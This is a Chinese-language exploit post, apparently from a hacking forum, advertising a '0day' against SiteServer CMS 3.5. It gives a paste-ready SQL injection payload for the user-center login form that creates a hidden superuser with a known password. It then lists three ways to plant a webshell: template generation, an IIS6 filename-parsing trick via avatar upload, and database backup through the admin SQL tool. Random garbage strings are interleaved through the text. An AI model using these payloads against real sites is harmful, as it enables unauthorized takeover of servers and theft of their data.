SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn



EXP:

" Z. _' I  R6 N% }' u6 E% U4 z: r/ H0 ]直接访问UserCenter/login.aspx

! p4 ~# J0 P" S
# c: h! Y7 [, s
用户名处输入：
2 ?6 R9 P; \* N2 y
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
* u" P$ d* c5 j$ @$ R6 Y

" \" s2 W  w- J. E; s. y8 s% D4 a. j
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
6 [' f$ @/ G2 p* W4 C
- x/ U. D* M" c6 e" }$ o; r
. j! E! q  A3 c7 u  X
之后再访问后台SiteServer/login.aspx用插入的用户登陆



3 S+ r/ P) }7 ~8 A5 e后台拿webshell的三种方法：

7 [6 E: ~8 @7 v( j一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/

) y- j8 H" ^* B' U用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
0 _8 |$ F/ d$ L" F
( h6 V% P4 l8 K（ps：后台添加用户时不会验证是否含有非法字符）
" Q9 c( L* {% j! n+ L
三、

系统工具-》实用工具-》机器参数查看
  z1 J% T: {: Q可以看到数据库类型、名称，WEB路径
5 d: U" P$ N8 p6 ?" \- S4 r9 {( @0 E( K
. Q$ f& i  c2 e1 Q系统工具-》数据库工具-》SQL语句查询
7 q0 l# `  l* _8 S' I这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
# E+ B: H6 O0 u+ v' p